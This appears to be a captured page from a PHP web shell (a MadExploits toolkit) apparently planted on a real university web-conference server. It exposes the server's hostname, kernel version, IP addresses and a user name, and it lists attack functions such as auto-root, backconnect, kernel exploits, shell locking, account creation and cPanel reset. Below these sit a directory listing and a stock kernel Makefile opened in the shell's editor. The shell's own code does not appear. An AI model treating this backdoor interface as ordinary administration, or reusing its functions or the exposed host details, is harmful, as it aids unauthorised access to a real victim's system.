Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.128.201.30
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-186 /
drivers /
media /
[ HOME SHELL ]
Name
Size
Permission
Action
cec
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
dvb-core
[ DIR ]
drwxr-xr-x
dvb-frontends
[ DIR ]
drwxr-xr-x
firewire
[ DIR ]
drwxr-xr-x
i2c
[ DIR ]
drwxr-xr-x
mc
[ DIR ]
drwxr-xr-x
mmc
[ DIR ]
drwxr-xr-x
pci
[ DIR ]
drwxr-xr-x
platform
[ DIR ]
drwxr-xr-x
radio
[ DIR ]
drwxr-xr-x
rc
[ DIR ]
drwxr-xr-x
spi
[ DIR ]
drwxr-xr-x
tuners
[ DIR ]
drwxr-xr-x
usb
[ DIR ]
drwxr-xr-x
v4l2-core
[ DIR ]
drwxr-xr-x
Kconfig
5.87
KB
-rw-r--r--
Makefile
740
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile for the kernel multimedia device drivers. # # # I2C drivers should come before other drivers, otherwise they'll fail # when compiled as builtin drivers # obj-y += i2c/ tuners/ obj-$(CONFIG_DVB_CORE) += dvb-frontends/ # # Now, let's link-in the media controller core # ifeq ($(CONFIG_MEDIA_CONTROLLER),y) obj-$(CONFIG_MEDIA_SUPPORT) += mc/ endif obj-$(CONFIG_VIDEO_DEV) += v4l2-core/ obj-$(CONFIG_DVB_CORE) += dvb-core/ # There are both core and drivers at RC subtree - merge before drivers obj-y += rc/ obj-$(CONFIG_CEC_CORE) += cec/ # # Finally, merge the drivers that require the core # obj-y += common/ platform/ pci/ usb/ mmc/ firewire/ spi/ obj-$(CONFIG_VIDEO_DEV) += radio/
Close